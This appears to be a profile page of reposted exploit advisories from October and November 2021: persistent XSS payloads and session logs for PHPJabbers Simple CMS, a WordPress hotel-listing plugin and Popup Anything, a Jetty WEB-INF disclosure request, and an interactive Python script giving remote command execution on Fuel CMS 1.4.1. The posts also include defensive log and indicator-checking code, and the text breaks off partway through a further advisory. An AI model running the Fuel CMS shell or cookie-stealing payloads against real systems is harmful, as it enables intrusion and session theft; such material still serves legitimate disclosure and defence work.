
Everything posted by HireHackking
-
PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
# Google Dork: subtitle:Copyright © 2021 PHPJabbers.com
# Date: 2021-10-28
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: v5
# Tested on: Linux

Document Title:
===============
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2300

Release Date:
=============
2021-10-28

Vulnerability Laboratory ID (VL-ID):
====================================
2300

Common Vulnerability Scoring System:
====================================
5.4

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the Developer License and customize the script to fit your specific needs.

(Copy of the Homepage: https://www.phpjabbers.com/simple-cms/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.
Affected Product(s):
====================
PHPJabbers
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the PHPJabbers Simple CMS v5.0 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) POST method requests. Privileged authenticated accounts with UI access are able to inject their own malicious script code as the `name` of a user. The injected code executes whenever the user list (pjAdminUsers) is rendered, because the stored name is written unescaped into both a text node and the `value` attribute of the list row (see the vulnerable source below).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create (Add)
[+] Update

Vulnerable Parameter(s):
[+] pjActionCreate
[+] pjActionUpdate

Affected Module(s):
[+] pjAdminUsers

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged user accounts and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Payloads
"><img src=evil.source onload=alert(document.cookie)>
"><img src=evil.source onload=alert(document.domain)>

--- PoC Session Logs (POST) [Add & Update] ---
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin: https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer: https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247; _gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5; pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer: https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247; _gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5; pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
Keep-Alive: timeout=10, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247; _gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5; pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
-
GET: HTTP/1.1 200 OK
Server: Apache/2.2.15 (CentOS)
Content-Length: 380
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable">
<option value="T">Active</option>
<option value="F">Inactive</option></select></td>
<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1" class="pj-table-icon-edit"></a></td></tr>
<tr class="pj-table-row-even" data-id="id_3">
<td><input type="checkbox" name="record[]" value="3" class="pj-table-select-row"></td>
<td class="pj-table-cell-editable">
<span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span>
<input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td>
<td class="pj-table-cell-editable">
<span class="pj-table-cell-label">test@ftp.world</span>
<input type="text" data-name="email" style="display: none;" class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td>
<td><span class="pj-table-cell-label">06-09-2021</span></td>
<td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td>
<td class="pj-table-cell-editable">
<span class="pj-table-cell-label pj-status pj-status-T">Active</span>
<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable">
<option value="T">Active</option><option value="F">Inactive</option></select></td>
<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a>
<a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr>
</tbody></table>

Reference(s):
https://phpjabbers-cms.localhost:8080/
https://phpjabbers-cms.localhost:8080/1630949262_438/
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
-
WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-28
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://hotel.eplug-ins.com/
# Software Link: https://hotel.eplug-ins.com/hoteldoc/
# Version: v3
# Tested on: Linux

Document Title:
===============
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2277

Release Date:
=============
2021-10-28

Vulnerability Laboratory ID (VL-ID):
====================================
2277

Common Vulnerability Scoring System:
====================================
5.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Hotel, Motel, Bar & Restaurant Listing Plugin + Membership plugin using WordPress with PHP and MySQL technology.

(Copy of the Homepage: https://hotel.eplug-ins.com/hoteldoc/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the official Hotel Listing v3.x WordPress plugin web-application.
Affected Product(s):
====================
e-plugins
Product: Hotel Listing v3.x - Plugin WordPress (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the official Hotel Listing v3.x WordPress plugin web-application. The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The vulnerabilities are located in the address, area, city, zipcode, state, country and location input fields of the "add new listing" form in the my-account module. Remote attackers can register a low privileged application user account and inject their own malicious script code with a persistent attack vector to hijack user/admin session credentials or to permanently manipulate the affected modules. The injected script code executes in the frontend on preview, and also in the backend when an administrative account lists (?&profile=all-post) or edits the listing. The request method to inject is POST and the attack vector is persistent, located on the application side.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add New Listing

Vulnerable Input(s):
[+] address
[+] area
[+] city
[+] zipcode
[+] state
[+] country

Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit

Proof of Concept (PoC):
=======================
The persistent web vulnerabilities can be exploited by remote attackers with low privileged user accounts and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E

(URL-decoded, the payload is: "><img>%20<img src="evil.source"> )

Vulnerable Source: new-listing
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4 ">Address</label>
<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter address Here">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Area</label>
<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter Area Here">
</div>
</div>
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4">City</label>
<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter city ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Zipcode</label>
<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>"" placeholder="Enter Zipcode ">
</div>
</div>
<div class=" form-group row">
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">State</label>
<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter State ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Country</label>
<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>" placeholder="Enter Country ">
</div>

--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin: http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer: http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
-
POST: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: http://hotel-eplug-ins.localhost:8000
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Encoding: gzip
-
http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
Host: hotel-eplug-ins.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
GET: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post

Solution - Fix & Patch:
=======================
1. Encode and parse all vulnerable input fields on transmit via POST method request.
2. Restrict the input fields to disallow usage of special chars.
3. Encode and escape the output content in the edit and list views themselves to remove the execution point.

Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerabilities in the hotel listing application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
-
WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03/11/2021
# Exploit Author: Luca Schembri
# Vendor Homepage: https://www.essentialplugin.com/
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
# Version: < 2.0.4

** Summary **
A low privileged user can perform stored XSS attacks.

** Plugin description **
Popup Anything is the best popup builder and marketing plugin that helps you get more email subscribers, increase sales and grow your business. Manage powerful modal popup for your WordPress blog or website. You can add an unlimited popup with your configurations.

** Vulnerable page **
http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit

** PoC **
Go to the "Popup Anything - Settings" tab and select "Simple Link" as "Link Type".
Select "Link Text" and use this payload:

test" onclick="alert(1)

Save the popup and reload the page. Now click on "Link Text" and it will execute the JavaScript code. The payload closes the double-quoted attribute the field value is written into and appends an onclick handler, which is why the code runs on click rather than on load.
The same attack can be exploited with the "Button Text" and "Popup width" fields.

** Remediation **
Upgrade to version 2.0.4 or later
-
Eclipse Jetty 11.0.5 - Sensitive File Disclosure
# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure
# Date: 2021-11-03
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
# Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
# Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
# Tested on: Kali Linux
# CVE : CVE-2021-34429
# Github POC: https://github.com/ColdFusionX/CVE-2021-34429

POC - Access WEB-INF/web.xml

The path uses %u002e, a non-standard encoding of ".", for the dot of a "/./" segment. The affected Jetty versions accept that encoding, so the request resolves to /WEB-INF/web.xml while the check that rejects a literal /WEB-INF/ path does not fire, and the deployment descriptor is served.

## Request
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:9006
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

## Response
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
  <display-name>ColdFusionX - Web Application</display-name>
</web-app>
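Log triage for the request above, as an added example that is not part of the original advisory or the linked PoC repository. It decodes %uXXXX and %XX escapes, collapses "." and ".." segments, and only then checks whether the request lands under /WEB-INF or /META-INF, so the %u002e form from the PoC and a letter-encoded variant such as %57EB-INF are both caught, while a file merely named "WEB-INF-layout.html" is not. The access-log lines are constructed for the demo; the first one corresponds to the PoC request, the others are invented comparison cases.

```python
import re
from urllib.parse import unquote

# Constructed common-log-format lines for the demo (not real traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [03/Nov/2021:08:25:24 +0000] "GET /%u002e/WEB-INF/web.xml HTTP/1.1" 200 209
127.0.0.1 - - [03/Nov/2021:08:25:30 +0000] "GET /index.html HTTP/1.1" 200 1024
127.0.0.1 - - [03/Nov/2021:08:25:41 +0000] "GET /docs/WEB-INF-layout.html?v=3 HTTP/1.1" 200 77
127.0.0.1 - - [03/Nov/2021:08:25:52 +0000] "GET /static/../%2e/%57EB-INF/classes/db.properties HTTP/1.1" 200 311
"""

_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")
_REQUEST_LINE = re.compile(r'"(?:GET|HEAD|POST|OPTIONS) (\S+) HTTP/')
PROTECTED_DIRS = ("/WEB-INF", "/META-INF")


def decode_path(raw):
    """Decode the non-standard %uXXXX form first (what the PoC relies on),
    then ordinary %XX escapes, so no encoded byte survives into the check."""
    raw = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), raw)
    return unquote(raw)


def normalize_path(path):
    """Collapse '.', '..' and empty segments the way a resource lookup would."""
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def canonical_path(raw):
    """Strip the query string, decode, normalise."""
    return normalize_path(decode_path(raw.split("?", 1)[0]))


def reaches_protected_resource(raw):
    """True if the canonical path is /WEB-INF, /META-INF or anything below them.
    Case-insensitive on purpose: that is the conservative choice for detection."""
    canon = canonical_path(raw).upper()
    return any(canon == d or canon.startswith(d + "/") for d in PROTECTED_DIRS)


def scan_access_log(text):
    """Return (raw_path, canonical_path) for every request that hits a protected directory."""
    hits = []
    for line in text.splitlines():
        m = _REQUEST_LINE.search(line)
        if m and reaches_protected_resource(m.group(1)):
            hits.append((m.group(1), canonical_path(m.group(1))))
    return hits


if __name__ == "__main__":
    for raw, canon in scan_access_log(SAMPLE_LOG):
        print(f"{raw}  ->  {canon}")
```

A substring match on the raw request line for "WEB-INF" would have missed the %57EB-INF line and flagged the harmless WEB-INF-layout.html; canonicalising before comparing is the whole point. The same ordering (decode, normalise, then authorise) is what the server-side fix has to get right.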
-
Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

#!/usr/bin/python3
import argparse
import sys
from urllib.parse import quote

import requests
from colorama import Fore, Style

# FUEL CMS prints this error box right after the injected command's output,
# so everything before it in the response body is the command result.
ERROR_DIV = '<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">'


def get_arguments():
    parser = argparse.ArgumentParser(
        description='Fuel CMS 1.4.1 - Remote Code Execution Exploit',
        usage=f'python3 {sys.argv[0]} -u <url>',
        epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
    parser.add_argument('-v', '--version', action='version', version='1.2',
                        help='show the version of exploit')
    parser.add_argument('-u', '--url', metavar='url', dest='url', help='Enter the url')
    args = parser.parse_args()
    if len(sys.argv) <= 2:
        parser.print_usage()
        sys.exit()
    return args


args = get_arguments()
url = args.url.rstrip('/')
if "http" not in url:
    sys.stderr.write("Enter a valid url\n")
    sys.exit()

try:
    r = requests.get(url)
    if r.status_code == 200:
        print(Style.BRIGHT + Fore.GREEN + "[+]Connecting..." + Style.RESET_ALL)
except requests.ConnectionError:
    print(Style.BRIGHT + Fore.RED + "Can't connect to url" + Style.RESET_ALL)
    sys.exit()

while True:
    cmd = input(Style.BRIGHT + Fore.YELLOW + "Enter Command $" + Style.RESET_ALL)
    # The 'filter' value of /fuel/pages/select is evaluated as PHP (CVE-2018-16763).
    # URL-decoded, the injected string is:  '+pi(print($a='system'))+$a('<cmd>')+'
    main_url = (url + "/fuel/pages/select/?filter="
                "%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"
                + quote(cmd) + "%27%29%2b%27")
    r = requests.get(main_url)
    output = r.text.split(ERROR_DIV)
    print(output[0])
    if cmd == "exit":
        break
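The script above hides the injected PHP behind percent-encoding. The following is an added example, not part of the exploit or of FUEL CMS, that builds the same URL the script requests, shows what the `filter` parameter decodes to, and flags the three things a legitimate page filter never contains but this injection must: a quote that closes the string literal and concatenates, a variable-function call such as `$a(...)`, and an exec-style builtin name. It also separates the command output from the CMS error box the same way the script does. The sample response body is constructed for the demo.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Percent-encoded wrapper the exploit script puts around the command.
PAYLOAD_PREFIX = ("%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27"
                  "%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27")
PAYLOAD_SUFFIX = "%27%29%2b%27"

# Marker FUEL CMS prints after the command output (the script splits on it too).
ERROR_DIV = '<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">'

# Indicators checked on the URL-decoded filter value, i.e. on what PHP sees.
INDICATORS = (
    ("quote-breakout", re.compile(r"'\s*[.+]")),                 # closes the literal, concatenates
    ("variable-function", re.compile(r"\$\w+\s*\(")),             # $a('...') calls whatever $a names
    ("exec-builtin", re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open)\b")),
)


def build_exploit_url(base, cmd):
    """Same URL the exploit script requests for a given command."""
    return (f"{base.rstrip('/')}/fuel/pages/select/?filter="
            f"{PAYLOAD_PREFIX}{quote(cmd)}{PAYLOAD_SUFFIX}")


def decoded_filter(url):
    """The filter value as PHP will see it after URL decoding."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("filter", [""])[0]


def injection_indicators(url):
    """Names of the indicators present in the decoded filter value (empty = looks benign)."""
    value = decoded_filter(url)
    return [name for name, rx in INDICATORS if rx.search(value)]


def extract_output(body):
    """Command output precedes the CMS error box; drop the box and what follows."""
    return body.split(ERROR_DIV, 1)[0].strip()


if __name__ == "__main__":
    u = build_exploit_url("http://10.10.21.74", "id")
    print("decoded filter:", decoded_filter(u))
    print("indicators:", injection_indicators(u))
    # Constructed response body in the shape the script parses.
    print(extract_output("uid=33(www-data) gid=33(www-data)\n" + ERROR_DIV + "<h4>A PHP Error was encountered</h4>"))
```

Run the indicator check over the decoded value, never the raw query string: `%27%2b` and `'+` are the same thing to the CMS, and a rule that only looks for the literal characters misses every encoded variant.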
-
Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux

Document Title:
===============
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2302

Release Date:
=============
2021-10-19

Vulnerability Laboratory ID (VL-ID):
====================================
2302

Common Vulnerability Scoring System:
====================================
5.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents. Just paste a single line of code on your web page section and start controlling it through the admin area. Very simple installation - one step installation wizard. Option to include contents into web page sections through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Full Authentication (Admin/Root Privileges)

